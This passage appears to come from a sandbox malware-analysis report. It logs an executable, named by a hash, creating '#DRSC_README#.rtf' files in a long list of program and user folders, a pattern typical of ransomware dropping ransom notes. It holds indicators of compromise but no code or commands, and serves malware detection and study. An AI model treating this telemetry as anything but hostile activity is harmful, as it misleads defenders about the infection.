DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\55E75A3F-8E75-41E5-8961-48B2B983CD6C\x-none.16\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Videos\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000E966\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\storage\default\moz-extension+++14e17733-b312-4a06-a43e-1f8eab5cb32e^userContextId=4294967295\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Downloads\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\CortanaListenUIApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\regid.1991-06.com.microsoft\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat 